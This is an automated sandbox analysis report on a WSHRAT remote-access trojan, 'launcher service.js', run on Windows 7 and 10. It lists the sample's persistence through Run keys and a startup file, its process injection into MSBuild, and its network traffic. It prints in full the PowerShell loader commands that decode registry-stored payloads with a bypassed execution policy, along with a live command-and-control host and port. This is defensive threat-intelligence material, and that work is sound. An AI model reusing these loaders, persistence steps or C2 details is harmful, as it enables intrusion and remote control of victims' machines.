Malware Analysis Report

2025-04-14 08:27

Sample ID 211210-c1v1sagdhp
Target launcher service.js
SHA256 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411
Tags
wshrat persistence suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411

Threat Level: Known bad

The file launcher service.js was found to be: Known bad.

Malicious Activity Summary

wshrat persistence suricata trojan

WSHRAT

suricata: ET MALWARE WSHRAT CnC Checkin

suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

Blocklisted process makes network request

Drops startup file

Adds Run key to start application

Looks up external IP address via web service

Suspicious use of SetThreadContext

Enumerates physical storage devices

Script User-Agent

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-12-10 02:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-12-10 02:33

Reported

2021-12-10 02:35

Platform

win7-en-20211208

Max time kernel

147s

Max time network

148s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"

Signatures

WSHRAT

trojan wshrat

suricata: ET MALWARE WSHRAT CnC Checkin

suricata

suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

suricata

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js C:\Windows\System32\wscript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\software\microsoft\windows\currentversion\run C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 880 set thread context of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1192 wrote to memory of 760 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1192 wrote to memory of 760 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 1192 wrote to memory of 760 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\wscript.exe
PID 760 wrote to memory of 1876 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1876 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1876 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1664 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1664 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 1664 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 880 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 880 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 760 wrote to memory of 880 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
PID 880 wrote to memory of 1672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"

C:\Windows\System32\wscript.exe

"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\launcher service.js"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'ben738sj11xz.mywire.org 5478 \"WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands\" 1'));"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

path ben738sj11xz.mywire.org 5478 "WSHRAT|8C677431|QSKGHMYQ|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 10/12/2021|JavaScript-v3.4|NL:Netherlands" 1

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 ben738sj11xz.mywire.org udp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp
US 107.172.73.191:5478 ben738sj11xz.mywire.org tcp

Files

memory/760-54-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\launcher service.js

MD5 8dce2fac1cdb56ef997f0c4f8065f82e
SHA1 da01f70d7035a8e8421d2296c7b481dc6dcb2b09
SHA256 6774ae9c26be549fc9096af5859d3e1614b2ce6993fde4ee85b7301134161411
SHA512 cb622198fee5d9810e6762f82c78da1a3868b1b67061d788b1af124f6f39456de73b7ba90452098983ff32762f28d471b1c546d228a393cf7364e1babfaac6a3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js

MD5 56cc519ca00b696dd0d9d838a9df6149
SHA1 bfcce8ca529830cc108ab0dfdb68fe7f28892fc2
SHA256 c603708f2f3ed06b04977c58aa125455c22420655f59f37f0b52d99bc70a09c0
SHA512 61c9d8dba7e20f3f3af3e95fb6ed86e6ee9ebb214f6eb97bfeb38fc66bbd35b1b7af70773ab99f3f33c5f47524d0075de0c07cc4024a59182c8fb10434be5ca5

memory/1876-57-0x0000000000000000-mapping.dmp

memory/1876-58-0x000007FEFBAB1000-0x000007FEFBAB3000-memory.dmp

memory/1876-60-0x00000000023C0000-0x00000000023C2000-memory.dmp

memory/1876-61-0x00000000023C2000-0x00000000023C4000-memory.dmp

memory/1876-62-0x00000000023C4000-0x00000000023C7000-memory.dmp

memory/1876-59-0x000007FEF27B0000-0x000007FEF330D000-memory.dmp

memory/1876-63-0x00000000023CB000-0x00000000023EA000-memory.dmp

memory/1664-64-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2f456a2e7614bd05f70e38f44de562e8
SHA1 a178d6029bf058155afe0a1189f272df8e8f501e
SHA256 b1445efff6c939d9b31332af4721d3d9e859b195d663931f5a9851abe336cb04
SHA512 bb34e25ae60da30aa0c9bff74678b127ba9cad85f4bcbe46ba93d06ecba14e975ad978b50a75260134d67f105e42a1d37a363148041dab9ac713a3131a75b01e

memory/1664-67-0x000007FEF2740000-0x000007FEF329D000-memory.dmp

memory/1664-68-0x0000000002560000-0x0000000002562000-memory.dmp

memory/1664-70-0x0000000002564000-0x0000000002567000-memory.dmp

memory/1664-69-0x0000000002562000-0x0000000002564000-memory.dmp

memory/1664-71-0x000000001B730000-0x000000001BA2F000-memory.dmp

memory/1664-72-0x000000000256B000-0x000000000258A000-memory.dmp

memory/880-73-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2f456a2e7614bd05f70e38f44de562e8
SHA1 a178d6029bf058155afe0a1189f272df8e8f501e
SHA256 b1445efff6c939d9b31332af4721d3d9e859b195d663931f5a9851abe336cb04
SHA512 bb34e25ae60da30aa0c9bff74678b127ba9cad85f4bcbe46ba93d06ecba14e975ad978b50a75260134d67f105e42a1d37a363148041dab9ac713a3131a75b01e

memory/880-76-0x000007FEF27B0000-0x000007FEF330D000-memory.dmp

memory/880-77-0x0000000002740000-0x0000000002742000-memory.dmp

memory/880-79-0x0000000002744000-0x0000000002747000-memory.dmp

memory/880-78-0x0000000002742000-0x0000000002744000-memory.dmp

memory/880-80-0x000000001B700000-0x000000001B9FF000-memory.dmp

memory/1672-81-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-82-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-83-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-84-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-85-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-86-0x0000000000400000-0x000000000040E000-memory.dmp

memory/1672-87-0x00000000004071AE-mapping.dmp

memory/880-88-0x000000000274B000-0x000000000276A000-memory.dmp

memory/1672-89-0x0000000074EC1000-0x0000000074EC3000-memory.dmp

memory/1672-90-0x0000000000370000-0x0000000000371000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-12-10 02:33

Reported

2021-12-10 02:35

Platform

win10-en-20211208

Max time kernel

150s

Max time network

155s

Command Line

wscript.exe "C:\Users\Admin\AppData\Local\Temp\launcher service.js"

Signatures

WSHRAT

trojan wshrat

suricata: ET MALWARE WSHRAT CnC Checkin

suricata

suricata: ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin 1

suricata

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js C:\Windows\system32\wscript.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\launcher service.js C:\Windows\System32\wscript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\software\microsoft\windows\currentversion\run C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\launcher service = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\launcher service.js\"" C:\Windows\system32\wscript.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 864 set thread context of 2160 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A
HTTP User-Agent header WSHRAT|A441E75A|MHKKHUYI|Admin|Microsoft Windows 10 Enterprise|plus|nan-av|false - 13/12/2021|JavaScript-v3.4|NL:Netherlands N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
